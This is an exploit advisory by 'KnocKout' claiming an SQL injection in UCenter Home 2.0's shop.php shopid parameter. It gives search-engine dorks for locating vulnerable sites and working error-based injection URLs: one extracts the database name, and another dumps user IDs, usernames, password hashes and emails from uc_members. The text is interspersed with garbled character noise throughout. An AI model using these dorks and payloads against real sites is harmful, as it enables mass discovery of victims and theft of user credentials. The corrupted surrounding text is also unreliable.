2 N% y6 P" a0 G6 D7 e
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ & n/ h+ Q4 F/ h& f% M4 O
+ G8 Q5 w/ }. B5 l/ _, M6 h4 O" G
. Z* k4 n; G6 y; }! y- v9 y) b
/ g( X6 j6 n& f0 b6 }*/ Author : KnocKout
! }. _5 N* R1 @0 D9 m' @) D5 w2 M% J5 E
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers % x% ]! z/ ]2 B4 B$ _
6 C9 N; C& Z+ r: i' s( b4 B
*/ Contact: knockoutr@msn.com
& X3 w V$ @4 t' f/ E7 S3 v7 w! a# o5 \5 N6 C% l9 m
*/ Cyber-Warrior.org/CWKnocKout / B& G) S: U8 T- d* q7 l% i# q
4 ?* ?* S; R4 q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
* r9 S2 B$ `2 a7 @0 b( p; C# }" m* o! {# Q2 i, x+ b& g2 q& U
Script : UCenter Home
) c2 F" }9 ?+ U2 m5 Z2 D% L( O: s/ g% I: M( a
Version : 2.0
7 |6 n; e# J% O) G7 q# ~$ h
: C! N& H/ W( }) o3 m. S* jScript HomePage : http://u.discuz.net/
# Z8 W T' E& }1 i4 V3 V% A
& u8 p) w% [- e- W5 X! G__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
. K" F6 L- X' t) P, P; C+ i2 ]/ A8 P3 e9 q0 O
Dork : Powered by UCenter inurl:shop.php?ac=view 2 w* W, L Q/ ]! Y" w
* |) c, _4 p7 O1 T) D! N7 V
Dork 2 : inurl:shop.php?ac=view&shopid= % \! _4 o% q J
2 v0 w3 i0 b3 I' F" R* ^0 B__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 7 {- A8 l0 n7 U& |" ?! ], v
% o1 A- r8 L8 d
Vuln file : Shop.php 7 a" Z) M' k U& P
: L: V, ~! p1 T A% I$ Rvalue's : (?)ac=view&shopid= 5 l6 i$ U4 I8 d9 f3 t1 S
- @5 n7 w8 h3 ]5 a- X- r' O
Vulnerable Style : SQL Injection (MySQL Error Based)
' t# [" y# M$ I) L; U# ?$ p- e Q# ^# Y& e
Need Metarials : Hex Conversion
1 |, J: F% E0 F4 B( a: x6 `: d; ~# B- H$ I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! N' J# D: W, B3 S9 D% ^9 H, K# }7 \0 J9 @2 q* f9 H
Your Need victim Database name. & k3 I: e) f4 K, g9 A# k2 z$ h
$ _+ l! J1 ?, {1 }, ?for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2 I& R8 k% H# v' ~1 _( o
2 j/ s' Y! m J1 F* ~.. # n# w& H( c$ v2 J/ a0 `$ F
7 j( X) c1 T. D( ?8 V0 _* KDB : Okey. - z Z4 O4 V( l- a% z$ x
( ^ X( V- h+ @/ T9 J# h
your edit DB `[TARGET DB NAME]` 7 }; M/ o2 ]! t8 C# m; l# x
/ L' p/ l9 S2 `4 F8 yExample : 'hiwir1_ucenter'
& E, \. B3 |8 y0 w7 {$ a- e- U( J0 @9 W' e6 `8 |+ P! {
Edit : Okey. - M: p" Z$ O3 m/ Z8 y0 n! O/ b- V
. W+ _, {' D" H; p6 I2 W7 Y
Your use Hex conversion. And edit Your SQL Injection Exploit..
! I3 P8 g2 _7 B. Q" h b& I% e: o7 M& V4 A; k
8 E8 ^9 `! B/ o3 U G3 M3 r
6 _- P% J' X$ N2 t3 K$ N! a6 W; o1 _Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 9 m6 o: r+ N! t! h; W
|